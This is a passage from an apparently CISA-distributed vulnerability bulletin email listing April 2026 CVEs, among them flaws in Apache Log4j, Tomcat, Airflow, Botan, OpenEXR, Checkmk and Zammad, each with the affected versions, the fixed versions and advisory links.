    <a href="https://github.com/apache/logging-log4j2/pull/4077" target="_blank" rel="noopener">https://github.com/apache/logging-log4j2/pull/4077</a><br><a href="https://logging.apache.org/security.html#CVE-2026-34480" target="_blank" rel="noopener">https://logging.apache.org/security.html#CVE-2026-34480</a><br><a href="https://logging.apache.org/cyclonedx/vdr.xml" target="_blank" rel="noopener">https://logging.apache.org/cyclonedx/vdr.xml</a><br><a href="https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout" target="_blank" rel="noopener">https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout</a><br><a href="https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb" target="_blank" rel="noopener">https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Log4j JSON Template Layout</td>
    <td>Apache Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records. An attacker can exploit this issue only if both of the following conditions are met: * The application uses JsonTemplateLayout. * The application logs a MapMessage containing an attacker-controlled floating-point value. Users are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34481" target="_blank" rel="noopener">CVE-2026-34481</a></td>

    <a href="https://github.com/apache/logging-log4j2/pull/4080" target="_blank" rel="noopener">https://github.com/apache/logging-log4j2/pull/4080</a><br><a href="https://logging.apache.org/security.html#CVE-2026-34481" target="_blank" rel="noopener">https://logging.apache.org/security.html#CVE-2026-34481</a><br><a href="https://logging.apache.org/cyclonedx/vdr.xml" target="_blank" rel="noopener">https://logging.apache.org/cyclonedx/vdr.xml</a><br><a href="https://logging.apache.org/log4j/2.x/manual/json-template-layout.html" target="_blank" rel="noopener">https://logging.apache.org/log4j/2.x/manual/json-template-layout.html</a><br><a href="https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv" target="_blank" rel="noopener">https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Tomcat</td>
    <td>Improper Encoding or Escaping of Output vulnerability in the JsonAccessLogValve component of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.40 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34483" target="_blank" rel="noopener">CVE-2026-34483</a></td>

    <a href="https://lists.apache.org/thread/j1w7304yonlr8vo1tkb5nfs7od1y228b" target="_blank" rel="noopener">https://lists.apache.org/thread/j1w7304yonlr8vo1tkb5nfs7od1y228b</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Tomcat</td>
    <td>Missing Encryption of Sensitive Data vulnerability in Apache Tomcat due to the fix for CVE-2026-29146 allowing the bypass of the EncryptInterceptor. This issue affects Apache Tomcat: 11.0.20, 10.1.53, 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34486" target="_blank" rel="noopener">CVE-2026-34486</a></td>

    <a href="https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly" target="_blank" rel="noopener">https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Tomcat</td>
    <td>Insertion of Sensitive Information into Log File vulnerability in the cloud membership for clustering component of Apache Tomcat exposed the Kubernetes bearer token. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.13 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34487" target="_blank" rel="noopener">CVE-2026-34487</a></td>

    <a href="https://lists.apache.org/thread/4xpkwolpkrj8v5xzp5nyovtlqp3y850h" target="_blank" rel="noopener">https://lists.apache.org/thread/4xpkwolpkrj8v5xzp5nyovtlqp3y850h</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Tomcat</td>
    <td>CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled and FFM is used in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M14 through 11.0.20, from 10.1.22 through 10.1.53, from 9.0.92 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fixes the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34500" target="_blank" rel="noopener">CVE-2026-34500</a></td>

    <a href="https://lists.apache.org/thread/7rcl4zdxryc8hy3htyfyxkbqpxjtfdl2" target="_blank" rel="noopener">https://lists.apache.org/thread/7rcl4zdxryc8hy3htyfyxkbqpxjtfdl2</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Airflow</td>
    <td>In Apache Airflow versions 3.0.0 through 3.1.8, the DagRun wait endpoint returns XCom result values even to users who only have DAG Run read permissions, such as the Viewer role. This behavior conflicts with the FAB RBAC model, which treats XCom as a separate protected resource, and with the security model documentation that defines the Viewer role as read-only. Airflow uses the FAB Auth Manager to manage access control on a per-resource basis. The Viewer role is intended to be read-only by default, and the security model documentation defines Viewer users as those who can inspect DAGs without accessing sensitive execution results. Users are recommended to upgrade to Apache Airflow 3.2.0 which resolves this issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34538" target="_blank" rel="noopener">CVE-2026-34538</a></td>

    <a href="https://github.com/apache/airflow/pull/64415" target="_blank" rel="noopener">https://github.com/apache/airflow/pull/64415</a><br><a href="https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl" target="_blank" rel="noopener">https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl</a><br></td>
    </tr>

    <td class="vendor-product">randombit--botan</td>
    <td>Botan is a C++ cryptography library. In 3.11.0, the function Certificate_Store::certificate_known had a misleading name; it would return true if any certificate in the store had a DN (and subject key identifier, if set) matching that of the argument. It did not check that the cert it found and the cert it was passed were actually the same certificate. In 3.11.0 an extension of path validation logic was made which assumed that certificate_known only returned true if the certificates were in fact identical. The impact is that if an end entity certificate is presented, and its DN (and subject key identifier, if set) match that of any trusted root, the end entity certificate is accepted immediately as if it itself were a trusted root. This vulnerability is fixed in 3.11.1.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34580" target="_blank" rel="noopener">CVE-2026-34580</a></td>

    <a href="https://github.com/randombit/botan/security/advisories/GHSA-v782-6fq4-q827" target="_blank" rel="noopener">https://github.com/randombit/botan/security/advisories/GHSA-v782-6fq4-q827</a><br></td>
    </tr>

    <td class="vendor-product">randombit--botan</td>
    <td>Botan is a C++ cryptography library. Prior to version 3.11.1, the TLS 1.3 implementation allowed ApplicationData records to be processed prior to the Finished message being received. A server which is attempting to enforce client authentication via certificates can be bypassed by a client which entirely omits Certificate, CertificateVerify, and the Finished message and instead sends application data records. This vulnerability is fixed in 3.11.1.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34582" target="_blank" rel="noopener">CVE-2026-34582</a></td>

    <a href="https://github.com/randombit/botan/security/advisories/GHSA-pxcj-9ppx-g86g" target="_blank" rel="noopener">https://github.com/randombit/botan/security/advisories/GHSA-pxcj-9ppx-g86g</a><br></td>
    </tr>

    <td class="vendor-product">AcademySoftwareFoundation--openexr</td>
    <td>OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.1.0 to before 3.2.7, 3.3.9, and 3.4.9, internal_exr_undo_piz() advances the working wavelet pointer with signed 32-bit arithmetic. Because nx, ny, and wcount are int, a crafted EXR file can make this product overflow and wrap. The next channel then decodes from an incorrect address. The wavelet decode path operates in place, so this yields both out-of-bounds reads and out-of-bounds writes. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34588" target="_blank" rel="noopener">CVE-2026-34588</a></td>

    <a href="https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-588r-cr5c-w6hf" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-588r-cr5c-w6hf</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9</a><br></td>
    </tr>

    <td class="vendor-product">AcademySoftwareFoundation--openexr</td>
    <td>OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, the DWA lossy decoder constructs temporary per-component block pointers using signed 32-bit arithmetic. For a large enough width, the calculation overflows and later decoder stores operate on a wrapped pointer outside the allocated rowBlock backing store. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34589" target="_blank" rel="noopener">CVE-2026-34589</a></td>

    <a href="https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-p8xc-w3q4-h64x" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-p8xc-w3q4-h64x</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9</a><br></td>
    </tr>

<tr>
<td class="vendor-product">Checkmk GmbH--Checkmk</td>
<td>Insufficient sanitization of dashboard dashlet title links in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows an attacker with dashboard creation privileges to perform stored cross-site scripting (XSS) attacks by tricking a victim into clicking a crafted dashlet title link on a shared dashboard.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3466" target="_blank" rel="noopener">CVE-2026-3466</a></td>
<td><a href="https://checkmk.com/werk/19033" target="_blank" rel="noopener">https://checkmk.com/werk/19033</a><br>
<a href="https://www.vulncheck.com/advisories/checkmk-stored-cross-site-scripting-in-dashlet-title" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/checkmk-stored-cross-site-scripting-in-dashlet-title</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the HTML sanitizer for ticket articles was missing proper sanitization of data: ... URI schemes, resulting in such malicious content being stored in the database of the Zammad instance. The Zammad GUI renders this content; because of the applied CSP rules, no harm was done by, e.g., clicking such a link. This vulnerability is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34718" target="_blank" rel="noopener">CVE-2026-34718</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-c2cf-9fc7-jhf3" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-c2cf-9fc7-jhf3</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the webhook model was missing proper validation for loopback addresses or link-local addresses; only the URL scheme (HTTP/HTTPS) and the hostname were checked. This could result in retrieving confidential metadata of cloud/hosting providers. The existing check is now extended and is applied both when configuring webhooks and when triggering webhook jobs. This vulnerability is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34719" target="_blank" rel="noopener">CVE-2026-34719</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-2vgc-vfh2-rw75" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-2vgc-vfh2-rw75</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the SSO mechanism in Zammad was not verifying that the header originates from a trusted SSO proxy/gateway before applying further actions on it. This vulnerability is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34720" target="_blank" rel="noopener">CVE-2026-34720</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-hcv6-w4h9-p2p7" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-hcv6-w4h9-p2p7</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the OAuth callback endpoints for Microsoft, Google, and Facebook external credentials do not validate a CSRF state parameter. This vulnerability is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34721" target="_blank" rel="noopener">CVE-2026-34721</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-mfwp-hx66-626c" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-mfwp-hx66-626c</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the endpoint used for ticket creation was missing an authorization check when the related parameter for adding links is used. This vulnerability is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34722" target="_blank" rel="noopener">CVE-2026-34722</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, unauthenticated remote attackers were able to access the getting-started endpoint and obtain sensitive internal entity data, even after the system setup was completed. This vulnerability is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34723" target="_blank" rel="noopener">CVE-2026-34723</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-hcm9-ch62-5727" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-hcm9-ch62-5727</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1, a server-side template injection vulnerability that leads to RCE via the AI Agent exists. Impact is limited to environments where an attacker can control or influence type_enrichment_data (typically high-privilege administrative configuration). This vulnerability is fixed in 7.0.1.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34724" target="_blank" rel="noopener">CVE-2026-34724</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-fg9w-jg8f-4j94" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-fg9w-jg8f-4j94</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the REST endpoint POST /api/v1/ai_assistance/text_tools/:id was not checking whether a user is privileged to use the text tool, so it could be used in all situations. This vulnerability is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34782" target="_blank" rel="noopener">CVE-2026-34782</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-96r7-29c8-2j7q" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-96r7-29c8-2j7q</a></td>
</tr>

<tr>
<td class="vendor-product">zammad--zammad</td>
<td>Zammad is a web-based open-source helpdesk/customer support system. Prior to 7.0.1, the REST endpoint POST /api/v1/ai_assistance/text_tools/:id contains an authorization failure. Context data (e.g., a group or organization) supplied for use in the AI prompt was not checked for accessibility by the current user. This leads to data being present in the AI prompt that was not authorized before being used. A user needs to have the ticket.agent permission to be able to use the provided context data. This vulnerability is fixed in 7.0.1.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34837" target="_blank" rel="noopener">CVE-2026-34837</a></td>
<td><a href="https://github.com/zammad/zammad/security/advisories/GHSA-89vv-6639-wcv8" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-89vv-6639-wcv8</a></td>
</tr>
    </tbody>
    </table>
    <p><a href=3D"#top">Back to top</a></p>
    </div>
    <p>n/a</p>
    </div>
    </div>
<style>body {
font-size: 1em; font-family: Arial, Verdana, sans-serif; font-weight: normal; font-style: normal; color: #333333;
}
</style>


    <div id=3D"mail_footer">

    </div>
    <div id=3D"tagline">
    <hr>
    <table style=3D"width: 100%;" border=3D"0" cellspacing=3D"0" cellpadding=3D=

    <tbody>
<tr>
<td style="color: #757575; font-size: 10px; font-family: Arial;" width="89%">This email was sent to cisa@toolazy.synchro.net using GovDelivery Communications Cloud, on behalf of: Cybersecurity and Infrastructure Security Agency &middot; 707 17th St, Suite 4000 &middot; Denver, CO 80202</td>
<td align="right" width="11%"><a href="https://subscriberhelp.granicus.com/" target="_blank" rel="noopener"><img src="https://content.govdelivery.com/images/govd-logo-dark.png" border="0" alt="GovDelivery logo" width="115"></a></td>
</tr>
</tbody>
</table>
<style type="text/css">body .abe-column-block { min-height: 5px; } table.gd_combo_table img {margin-left:10px; margin-right:10px;} table.gd_combo_table div.govd_image_display img, table.gd_combo_table td.gd_combo_image_cell img {margin-left:0px; margin-right:0px;}</style>

    </div>
    </td>
    </tr>
    </table>

    </body>
    </html>

    --===============2735279975235001205==--

    --===============3473165674994229290==--